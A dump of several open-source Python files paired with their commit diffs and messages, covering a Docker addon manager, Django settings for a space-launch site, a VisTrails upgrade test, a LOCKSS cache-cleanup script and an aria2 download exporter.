async def state(self, addon):
"""Return running state of addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return
if await self.dockers[addon].is_running():
return STATE_STARTED
return STATE_STOPPED
async def start(self, addon):
"""Set options and start addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
if not self.write_addon_options(addon):
_LOGGER.error("Can't write options for addon %s", addon)
return False
return await self.dockers[addon].run()
async def stop(self, addon):
"""Stop addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].stop()
async def update(self, addon, version=None):
"""Update addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
version = version or self.get_last_version(addon)
is_running = await self.dockers[addon].is_running()
# update
if await self.dockers[addon].update(version):
self.set_addon_update(addon, version)
if is_running:
await self.start(addon)
return True
return False
async def restart(self, addon):
"""Restart addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].restart()
async def logs(self, addon):
"""Return addons log output."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].logs()
|
Python
| 0
|
@@ -6671,32 +6671,175 @@
return False%0A%0A
+ if not self.write_addon_options(addon):%0A _LOGGER.error(%22Can't write options for addon %25s%22, addon)%0A return False%0A%0A
return a
|
21624d6434f2c47577d464ec57d44c479c9b43d7
|
Edit settings
|
spacelaunchnow/settings.py
|
spacelaunchnow/settings.py
|
"""
Django settings for spacelaunchnow project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from spacelaunchnow import config
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'assets')
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config.keys['DJANGO_SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['localhost', '.calebjones.me', '159.203.85.8', '.spacelaunchnow.me', '127.0.0.1', 'spacelaunchnow.me']
REST_FRAMEWORK = {
'PAGE_SIZE': 1000,
'DEFAULT_MODEL_SERIALIZER_CLASS': 'drf_toolbox.serializers.ModelSerializer',
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',),
'DEFAULT_THROTTLE_CLASSES': (
'rest_framework.throttling.AnonRateThrottle',
'rest_framework.throttling.UserRateThrottle'
),
'DEFAULT_THROTTLE_RATES': {
'anon': '100/day',
'user': '1000/day'
},
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
LOGIN_REDIRECT_URL = '/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] - [%(name)s - %(module)s - %(lineno)s] - %(message)s',
'datefmt': '%m-%d-%Y %H:%M:%S'
},
},
'handlers': {
'django_default': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/django.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
},
'console': {
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
'digest': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/bot/daily_digest.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
},
'notifications': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'log/bot/notification.log',
'formatter': 'standard',
'maxBytes': 1024*1024*5,
'backupCount': 5
}
},
'loggers': {
'django': {
'handlers': ['django_default', 'console'],
'propagate': True,
},
'bot.digest': {
'handlers': ['django_default', 'digest', 'console'],
'level': 'DEBUG',
'propagate': True,
},
'bot.notifications': {
'handlers': ['django_default', 'notifications', 'console'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api.apps.ApiConfig',
'rest_framework_docs',
'bot',
'djcelery',
'embed_video',
'jet',
'django.contrib.admin',
'django_user_agents',
'django_filters',
'rest_framework.authtoken'
]
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'spacelaunchnow.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR + '/templates/'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'spacelaunchnow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# CELERY STUFF
BROKER_URL = "amqp://spacelaunchnow:spacelaunchnow@localhost:5672/vhost_spacelaunchnow"
CELERY_ACCEPT_CONTENT = ['json']
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'UTC'
# Name of cache backend to cache user agents. If it not specified default
# cache alias will be used. Set to `None` to disable caching.
USER_AGENTS_CACHE = None
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
DEFAULT_FROM_EMAIL = 'Webmaster <webmaster@spacelaunchnow.me>'
|
Python
| 0.000001
|
@@ -4006,74 +4006,8 @@
%0A%5D%0A%0A
-EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'%0A%0A
MIDD
|
e635d6a1c4ca8c138a5bd288250f94bcd82bb8a8
|
Remove unnecessary imports.
|
vistrails/tests/resources/upgrades/init.py
|
vistrails/tests/resources/upgrades/init.py
|
from vistrails.core.modules.vistrails_module import Module
from vistrails.core.modules.config import IPort, OPort
from vistrails.core.upgradeworkflow import UpgradeWorkflowHandler, \
UpgradePackageRemap, UpgradeModuleRemap
class TestUpgradeA(Module):
_input_ports = [IPort("aaa", "basic:String")]
_output_ports = [OPort("zzz", "basic:Integer")]
class TestUpgradeB(Module):
_input_ports = [IPort("b", "basic:Integer")]
_modules = [TestUpgradeA, TestUpgradeB]
_upgrades = {"TestUpgradeA":
[UpgradeModuleRemap('0.8', '0.9', '0.9', None,
function_remap={'a': 'aa'},
src_port_remap={'z': 'zz'}),
UpgradeModuleRemap('0.9', '1.0', '1.0', None,
function_remap={'aa': 'aaa'},
src_port_remap={'zz': 'zzz'})]}
|
Python
| 0.000001
|
@@ -154,58 +154,8 @@
ort
-UpgradeWorkflowHandler, %5C%0A UpgradePackageRemap,
Upg
|
5f13d0a73a040b3a78842a8bae8dbf2df6e58d05
|
Fix typo and formating of warning message for No AUID entries.
|
test/frameworks/clean_up_daemon/clean_cache.py
|
test/frameworks/clean_up_daemon/clean_cache.py
|
#!/usr/bin/env python
# $Id: clean_cache.py,v 1.5 2011-04-12 19:01:19 barry409 Exp $
# Copyright (c) 2011 Board of Trustees of Leland Stanford Jr. University,
# all rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# STANFORD UNIVERSITY BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the name of Stanford University shall not
# be used in advertising or otherwise to promote the sale, use or other dealings
# in this Software without prior written authorization from Stanford University.
import optparse
import ConfigParser
import os
import sys
import urllib2
import fix_auth_failure
import lockss_daemon
__author__ = "Barry Hayes"
__maintainer__ = "Barry Hayes"
__version__ = "1.0.1"
class _SectionAdder(object):
"""Wrap a python configuration section around a file that doesn't
have one."""
def __init__(self, section, fp):
self.section_done = False
self.section = section
self.fp = fp
def readline(self):
if not self.section_done:
self.section_done = True
return '[%s]' % self.section
else:
return self.fp.readline()
class IdFileException(Exception):
pass
def _parser():
"""Make a parser for the arguments."""
parser = optparse.OptionParser(
description='Move cache directories on a LOCKSS daemon')
parser.add_option('-u', '--user', default='lockss-u')
parser.add_option('-p', '--password', default='lockss-p')
parser.add_option('-v', '--verbose', dest='verbose', action='store_true',
default=False)
parser.add_option('-q', '--quiet', dest='verbose', action='store_false')
parser.add_option('-f', '--force', dest='verify', action='store_false',
help='ignore auids not present on the daemon, '
'never prompt')
parser.add_option('-i', '--verify', dest='verify', action='store_true',
default=False, help='prompt before each move')
parser.add_option('--commands', action='store_true', default=False,
help='print mv commands, but do not move files')
parser.add_option('-d', '--directory', default='.',
help='the daemon directory where ./cache is '
'(default: \'.\')')
parser.add_option('--dest', default='deleted',
help='where under the daemon directory the cache '
'entries are moved to (default: \'deleted\')')
return parser
def _process_args():
parser = _parser()
(options, arguments) = parser.parse_args()
if arguments != []:
parser.error('There should be no arguments. Try --help')
return options
def _auid(cache_dir):
"""Return the AUID for the given cache dir."""
# If the #au_id_file isn't present, the daemon doesn't list the
# directory in the table, so no need to check if the file exists.
path = os.path.join(cache_dir, '#au_id_file')
f = open(os.path.join(path))
try:
auid = None
for line in f.readlines():
line = line.strip()
if line and line[0] != '#':
if auid is None:
auid = line
else:
raise IdFileException('%s contains more than one line.'
% path)
if auid is None:
raise IdFileException('%s contains no AUID.' % path)
finally:
f.close()
return auid
def main():
options = _process_args()
src = options.directory
local_txt = os.path.join(src, 'local.txt')
if (not os.path.isdir(os.path.join(src, 'cache'))
or not os.path.isfile(local_txt)):
raise Exception('%s doesn\'t look like a daemon directory. '
'Try --directory.' % src)
config = ConfigParser.ConfigParser()
local_config = open(local_txt)
config.readfp(_SectionAdder('foo', local_config))
port = config.get('foo', 'org.lockss.ui.port')
fix_auth_failure.fix_auth_failure()
client = lockss_daemon.Client('127.0.0.1', port,
options.user, options.password)
repos = client._getStatusTable( 'RepositoryTable' )[ 1 ]
no_auid = [r for r in repos if r['status'] == 'No AUID']
if no_auid:
print 'Warning: These cache directories has no AUID:'
for r in no_auid:
print r['dir']
deleted = [r for r in repos if r['status'] == 'Deleted']
for r in deleted:
r['auid'] = _auid(os.path.join(src, r['dir']))
deleted.sort(key=lambda r: r['auid'])
move_all = False
if options.verbose:
if deleted:
print 'These AUs have been deleted on the daemon:'
for r in deleted:
print r['auid']
if options.verify:
move_all = raw_input('move all [y]? ').startswith('y')
else:
print 'No deleted AUs.'
verify_each = options.verify and not move_all
dst = os.path.join(options.directory, options.dest)
for r in deleted:
dir = r['dir']
if not verify_each or \
verify_each and \
raw_input('move %s [n]? ' % r['auid']).startswith('y'):
src_r = os.path.join(src, dir)
dst_r = os.path.join(dst, dir)
if options.commands:
print "mv %s %s # %s" % (src_r, dst_r, r['auid'])
else:
os.renames(src_r, dst_r)
if __name__ == '__main__':
main()
|
Python
| 0.999994
|
@@ -46,9 +46,9 @@
v 1.
-5
+6
201
@@ -63,11 +63,11 @@
19:0
-1:1
+2:0
9 ba
@@ -5326,17 +5326,18 @@
ories ha
-s
+ve
no AUID
@@ -5391,16 +5391,30 @@
r%5B'dir'%5D
+%0A print
%0A%0A de
|
a2b19e7fd6b0004e4fa18b6d1b20f7347ca1964c
|
Fix wrong indentation
|
command/export.py
|
command/export.py
|
#!/usr/bin/env python2
# coding=utf-8
import json
import urllib2
import logging
import base64
from config import global_config
from bddown_core import Pan, GetFilenameError
def export(links):
for link in links:
pan = Pan(link)
count = 1
while count != 0:
link, filename, count = pan.info
if not filename and not link:
raise GetFilenameError("无法获取下载地址或文件名!")
export_single(filename, link)
def export_single(filename, link):
jsonrpc_path = global_config.jsonrpc
jsonrpc_user = global_config.jsonrpc_user
jsonrpc_pass = global_config.jsonrpc_pass
if not jsonrpc_path:
print "请设置config.ini中的jsonrpc选项"
exit(1)
jsonreq = json.dumps(
[{
"jsonrpc": "2.0",
"method": "aria2.addUri",
"id": "qwer",
"params": [
[link],
{
"out": filename,
"header": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
"\r\nReferer:http://pan.baidu.com/disk/home"
}]
}]
)
logging.debug(jsonreq)
try:
request = urllib2.Request(jsonrpc_path)
if jsonrpc_user and jsonrpc_pass:
base64string = base64.encodestring('%s:%s' % (jsonrpc_user, jsonrpc_pass)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
request.add_data(jsonreq)
req = urllib2.urlopen(request)
except urllib2.URLError as urle:
print urle
raise JsonrpcError("jsonrpc无法连接,请检查jsonrpc地址是否有误!")
if req.code == 200:
print "已成功添加到jsonrpc\n"
class JsonrpcError(Exception):
pass
|
Python
| 0.810919
|
@@ -1314,9 +1314,16 @@
ss:%0A
-%09
+
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.